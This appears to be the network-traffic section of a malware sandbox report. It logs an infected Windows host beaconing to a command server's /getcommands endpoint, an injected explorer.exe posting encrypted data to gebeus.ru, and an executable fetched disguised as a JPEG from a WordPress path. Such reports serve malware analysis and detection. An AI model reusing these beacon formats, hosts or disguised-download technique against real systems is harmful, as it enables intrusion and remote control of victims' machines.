                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 31
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=31
                                      Jul 15, 2024 06:13:57.902569056 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:57 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=qinmoeb4sq9tie22vbkqa3f6j5; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      76192.168.2.54979146.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:58.024775982 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 32
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=32
                                      Jul 15, 2024 06:13:58.721822977 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:58 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=i1fkcreqbaue3i822qjbueen3d; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      77192.168.2.54979246.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:58.907531977 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 33
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=33
                                      Jul 15, 2024 06:13:59.755383968 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:59 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=qq5uc9svprsodvea8t5k6r2lqt; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      78192.168.2.54979346.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:59.867857933 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 34
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=34
                                      Jul 15, 2024 06:14:00.590145111 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:14:00 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=2ue6uu90cqdkp7du7i1idl2725; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      79192.168.2.54979446.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:14:00.821029902 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 35
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=35
                                      Jul 15, 2024 06:14:01.514548063 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:14:01 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=a37rf8433fmeh16g21affu093b; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      80192.168.2.549795186.101.193.110801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:14:01.201127052 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://ddxjeoahbwmlur.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 275
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:14:01.201169014 CEST275OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 44 50 cc 88
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA .[k,vuDPTgv9dOo)Qz(>0K>]=:]NsC13>Yq.l>&{o8^+")bB<$(wl|,V$
                                      Jul 15, 2024 06:14:02.263787031 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:14:02 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      81192.168.2.54979646.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:14:01.661642075 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 36
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=36
                                      Jul 15, 2024 06:14:02.348503113 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:14:02 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=kno8e1shm8up2u33o2gf1ktmif; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      82192.168.2.54979746.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:14:02.461045980 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 37
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=37
                                      Jul 15, 2024 06:14:03.174436092 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:14:03 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=l5rs27r0brdu79hrut6uj9v62i; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      83192.168.2.54979846.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:14:03.312067032 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 38
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=38
                                      Jul 15, 2024 06:14:03.995114088 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:14:03 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=uailfj60o8kpjbed5dsat1ge00; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      84192.168.2.54979946.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:14:04.116628885 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 39
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=39
                                      Jul 15, 2024 06:14:05.041591883 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:14:04 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=765gq6l4f8s9nuadkujvpbhlrg; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      85192.168.2.54980046.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:14:05.164952040 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 30
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=40
                                      Jul 15, 2024 06:14:05.895535946 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:14:05 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=quc264b2og9lt1horl10iu2822; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      86192.168.2.54980146.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:14:06.007524014 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 31
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=41
                                      Jul 15, 2024 06:14:06.788981915 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:14:06 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=1ekheeu0442mfja0c536n0icbb; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      87192.168.2.549802186.101.193.110801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:14:06.573015928 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://gdirqpperuo.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 264
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:14:06.573030949 CEST264OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6f 32 b9 f9
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA .[k,vuo2p(n2Bzaho+|)]av2Z9W7Y+m[PZTa_Y-i!N2Vk]'rZC{Rl!g)#Yr
                                      Jul 15, 2024 06:14:07.635571957 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:14:07 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      88192.168.2.54980346.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:14:06.914453030 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 32
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=42
                                      Jul 15, 2024 06:14:07.621824026 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:14:07 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=l659ovpp0vph5kktee3pim4u8r; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      89192.168.2.54980446.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:14:08.149764061 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 33
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=43
                                      Jul 15, 2024 06:14:08.525175095 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:14:08 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=pp7315qmonsv3tk76lefftg3rp; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      90192.168.2.54980546.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:14:08.665982008 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 34
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=44
                                      Jul 15, 2024 06:14:09.352406025 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:14:09 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=o3ealam6emk7v5alg9sshal69q; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      91192.168.2.54980646.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:14:09.475162029 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 35
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=45
                                      Jul 15, 2024 06:14:10.161021948 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:14:10 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=h6m53uu1f974gofvu9qi6lksa0; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      92192.168.2.54980746.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:14:10.275562048 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 36
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=46
                                      Jul 15, 2024 06:14:10.966250896 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:14:10 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=std3c0lpes9k6nuju6c72ujihm; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.549727185.149.100.2424431028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-15 04:11:14 UTC179OUTGET /wp-content/images/pic1.jpg HTTP/1.1
                                      Connection: Keep-Alive
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Host: mussangroup.com
                                      2024-07-15 04:11:14 UTC451INHTTP/1.1 200 OK
                                      Connection: close
                                      cache-control: public, max-age=604800
                                      expires: Mon, 22 Jul 2024 04:11:13 GMT
                                      content-type: image/jpeg
                                      last-modified: Sun, 14 Jul 2024 11:57:22 GMT
                                      accept-ranges: bytes
                                      content-length: 2074333
                                      date: Mon, 15 Jul 2024 04:11:13 GMT
                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                      2024-07-15 04:11:14 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 da e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 6e 00 00 00 ce 06 00 00 42 00 00 83 38 00 00 00 10 00
                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOnB8
